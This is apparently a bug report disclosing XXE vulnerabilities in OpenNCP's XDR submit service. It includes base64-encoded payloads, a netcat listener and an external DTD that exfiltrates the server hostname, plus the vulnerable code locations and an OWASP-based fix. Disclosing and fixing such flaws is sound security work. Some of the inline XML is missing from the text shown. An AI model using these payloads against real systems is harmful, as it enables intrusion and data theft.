XXE vulnerabilities in XDR Submit
{}Case 1{}: Calling external service
Using following document content (xdr:document) in XDR submit {code:java}
%xxe; ]>{code} And in base64 encoded {code:java} PCFET0NUWVBFIGZvbyBbIDwhRU5USVRZICUgeHhlIFNZU1RFTSAiaHR0cDovLzEyNy4wLjAuMTo0NDQ0L1hYRVRFU1QiPiAleHhlOyBdPg {code} Start listening port 4444, "nc -l 4444", and submit XDR document and you'll get {code:java} GET /XXETEST HTTP/1.1 User-Agent: Java/11.0.20.1 Host: 127.0.0.1:4444 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive {code}
{}Case 2{}: Information leak
Using following document content in XDR submit {code:java}
%xxe; ]>{code} And in base64 encoded {code:java} PCFET0NUWVBFIGZvbyBbIDwhRU5USVRZICUgeHhlIFNZU1RFTSAiaHR0cDovLzEyNy4wLjAuMTo4MDAwL2V4dC5kdGQiPiAleHhlOyBdPg {code} For this, create ext.dtd file with following content {code:java}
">%ent; %send {code} And serve it using "python3 -m http.server".
Again listen port 4444, "nc -l 4444", and submit XDR document and you'll get {code:java} GET /?xxetest=my-supersecret-hostname HTTP/1.1 User-Agent: Java/11.0.20.1 Host: 127.0.0.1:4444 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive {code}
{}Problem{}:
Problem is in tr.com.srdc.epsos.util.XMLUtil class in parseContent(byte[]) and parseContent(String) methods where new DocumentBuilderFactory is created without enough protections for XXEs. It seems that there are more same kind of problems in that XMLUtil class.
These methods are called in processing XDR in XDRServiceImpl line 572 (calling DomUtils.byteToDocument(docBytes); OpenNCP 7.1.0) and XDR_ServiceMessageReceiverInOut line 182 (calling EadcUtilWrapper.toXmlDocument(...); OpenNCP 7.1.0).
{}Solution{}:
See [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html]
To be test with following options {code:java} documentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); documentBuilderFactory.setXIncludeAware(false); {code}
Check too the class XDRServiceImpl line 572 if the document is not valid the processing should stop (SAXParseException is thrown)?